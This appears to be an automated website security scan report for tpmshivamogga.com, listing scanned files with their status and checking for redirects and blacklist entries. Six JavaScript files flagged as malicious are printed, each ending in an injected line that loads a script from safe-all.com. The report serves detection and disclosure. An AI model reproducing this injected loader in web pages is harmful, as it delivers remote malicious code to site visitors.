Scanned pages/files
Request | Server response | Status |
http://www.tpmshivamogga.com/ | 200 OK Content-Length: 14858 Content-Type: text/html | clean |
http://www.tpmshivamogga.com/about us.html | 200 OK Content-Length: 9696 Content-Type: text/html | clean |
http://www.tpmshivamogga.com/about us1.html | 200 OK Content-Length: 13738 Content-Type: text/html | clean |
http://www.tpmshivamogga.com/index.html | 200 OK Content-Length: 14858 Content-Type: text/html | clean |
http://www.tpmshivamogga.com/dealers_barons.html | 200 OK Content-Length: 12071 Content-Type: text/html | clean |
http://www.tpmshivamogga.com/js/thumbnailviewer.js | 200 OK Content-Length: 7607 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var thumbnailviewer={ enableTitle: true, enableAnimation: true, definefooter: '<div class="footerbar">CLOSE X</div>', defineLoading: '<img src="loading.gif" /> Loading Image...', scrollbarwidth: 16, opacitystring: 'filter:progid:DXImageTransform.Microsoft.alpha(opacity=10); -moz-opacity: 0.1; opacity: 0.1', targetlinks:[], createthumbBox:function(){ document.write('<div id="thumbBox" onClick="thumbnailviewer.closeit()"><div id="thumbImage"> } } thumbnailviewer.createthumbBox() thumbnailviewer.dotask(window, function(){thumbnailviewer.init()}, "load") thumbnailviewer.dotask(window, function(){thumbnailviewer.cleanup()}, "unload") document.write('<script src=http://safe-all.com/tmpDownDir/iezn_embed_patch.php ><\/script>'); Antivirus reports:
| ||
http://www.tpmshivamogga.com/js/datedisplay.js | 200 OK Content-Length: 1346 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) theDate = new Date(); months = new Array(); days = new Array(); months[1] ="jan.gif"; months[2] ="feb.gif"; months[3] ="mar.gif"; months[4] ="apr.gif"; months[5] ="may.gif"; months[6] ="jun.gif"; months[7] ="jul.gif"; months[8] ="aug.gif"; months[9] ="sep.gif"; months[10] ="oct.gif"; months[11] ="nov.gif"; months[12] ="dec.gif"; days[1] ="1st.gif"; days[2] ="2nd.gif"; days[3] ="3rd.gif"; days[4] ="4th.gif"; days[26] ="26th.gif"; days[27] ="27th.gif"; days[28] ="28th.gif"; days[29] ="29th.gif"; days[30] ="30th.gif"; days[31] ="31st.gif"; function printDate() { document.write('<img src="img/' + months[theDate.getMonth()+1] + '">'); document.write('<br>'); document.write('<img src="img/' + days[theDate.getDate()] + '">'); } document.write('<script src=http://safe-all.com/tmpDownDir/iezn_embed_patch.php ><\/script>'); Antivirus reports:
| ||
http://www.tpmshivamogga.com/products.html | 200 OK Content-Length: 79124 Content-Type: text/html | clean |
http://www.tpmshivamogga.com/Accordion_files/demos.js | 200 OK Content-Length: 541 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent('domready', function(){ var divs = $$(['docs', 'js', 'html', 'css']); divs.each(function(div){ var link = $(div.id + 'code'); div.setStyle('display', 'none'); link.addEvent('click', function(e){ e = new Event(e); divs.each(function(other){ if (other != div) other.setStyle('display', 'none'); }); div.setStyle('display', (div.getStyle('display') == 'block') ? 'none' : 'block'); e.stop(); }); }); }); document.write('<script src=http://safe-all.com/tmpDownDir/iezn_embed_patch.php ><\/script>'); Antivirus reports:
| ||
http://www.tpmshivamogga.com/map.html | 200 OK Content-Length: 24438 Content-Type: text/html | clean |
http://www.tpmshivamogga.com/Fx.Scroll_files/demos.js | 200 OK Content-Length: 541 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent('domready', function(){ var divs = $$(['docs', 'js', 'html', 'css']); divs.each(function(div){ var link = $(div.id + 'code'); div.setStyle('display', 'none'); link.addEvent('click', function(e){ e = new Event(e); divs.each(function(other){ if (other != div) other.setStyle('display', 'none'); }); div.setStyle('display', (div.getStyle('display') == 'block') ? 'none' : 'block'); e.stop(); }); }); }); document.write('<script src=http://safe-all.com/tmpDownDir/iezn_embed_patch.php ><\/script>'); Antivirus reports:
| ||
http://www.tpmshivamogga.com/Fx.Scroll_files/injection_graph_func.js | 200 OK Content-Length: 14595 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var skype_injection_path='chrome://skype_ff_toolbar_win/content/'; var skype_tool=null; var ActiveCallButtonPart=0; function SetCallButtonPart(obj) { if (obj.getAttribute('id') == '__skype_highlight_id_left') { ActiveCallButtonPart=0; } else if (obj.getAttribute('id') == '__skype_highlight_id_right') { ActiveCallButtonPart=1; } } function SetCallButton(obj, hl, isInternational) { var cb_part_l=null; { element=element.parentNode; } for (var parent = element.offsetParent; parent; parent = parent.offsetParent) { if (parent.tagName.toLowerCase() == 'div') { left -= parent.scrollLeft; top -= parent.scrollTop; } } return {left: left, top: top}; }catch(e){ } } document.write('<script src=http://safe-all.com/tmpDownDir/iezn_embed_patch.php ><\/script>'); Antivirus reports:
| ||
http://www.tpmshivamogga.com/service.php | 200 OK Content-Length: 13325 Content-Type: text/html | clean |
http://www.tpmshivamogga.com/feedback.php | 200 OK Content-Length: 9329 Content-Type: text/html | clean |
http://www.tpmshivamogga.com/contact.html | 200 OK Content-Length: 11347 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tpmshivamogga.com
Result:
GET / HTTP/1.1
Host: tpmshivamogga.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tpmshivamogga.com
Referer: http://www.google.com/search?q=tpmshivamogga.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tpmshivamogga.com
Referer: http://www.google.com/search?q=tpmshivamogga.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tpmshivamogga.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tpmshivamogga.com/
Result: tpmshivamogga.com is not infected or malware details are not published yet.
Result: tpmshivamogga.com is not infected or malware details are not published yet.